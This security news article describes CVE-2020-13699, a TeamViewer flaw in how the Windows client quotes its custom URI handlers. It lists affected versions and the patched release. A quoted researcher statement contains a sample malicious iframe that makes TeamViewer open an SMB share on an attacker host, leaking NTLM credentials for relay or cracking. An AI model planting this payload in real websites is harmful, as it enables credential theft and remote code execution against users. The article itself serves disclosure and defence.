CVE-2020-13699, a high-risk vulnerability, has been recently discovered in the TeamViewer cloud. This flaw can be remotely exploited by threat actors to crack users’ passwords, which can subsequently lead to further system exploitation.

Successful manipulation of this vulnerability enables hackers to launch TeamViewer with arbitrary parameters. Further, the program can be forced to send an NTLM authentication request to the hacker’s system allowing permission for offline rainbow table attacks ad brute force cracking attempts. Furthermore, these attacks can be used to exploit the stolen credentials.

About TeamViewer

Developed by a German organization, TeamViewer GmbH is a program primarily used for remote control, online meetings, file transfers, desktop sharing and web conferencing. Available for Windows, Chrome OS, macOS, iOS, Android Linux, Windows RT Windows Phone 8, and Blackberry OS., the tool offers collaboration and presentation features.

Details about the vulnerability (CVE-2020-13699)

CVE-2020-13699  is a result of an unpatched search path or element. More precisely, this security weakness arises as a result of the application not properly quoting its custom URI handlers and can be manipulated when the system with an exposed version of TeamViewer visits a maliciously created website.

Jeffrey Hofmann, a Security Engineer with Praetorian, who discovered and responsibly gave information about the flaw, explained, “An attacker could embed a malicious iframe in a website with a crafted URL (iframe src=’teamviewer10: –play \\attacker-IP\share\’) that would launch the TeamViewer Windows desktop client and force it to open a remote SMB share.”

He added, “Windows will perform NTLM authentication when opening the SMB share, and that request can be relayed (using a tool like responder) for code execution (or captured for hash cracking).”

This particular vulnerability can be triggered remotely and needs no previous authentication. Additionally, the flaw seems to be perfect for targeted watering hole attacks.

Threat communication:

Currently, there is no evidence of this vulnerability being exploited in the wild.

Systems affected:

TeamViewer versions 8 through 15.8.2 are susceptible.

It is recommended for users to upgrade TeamViewer versions before 15.8.3.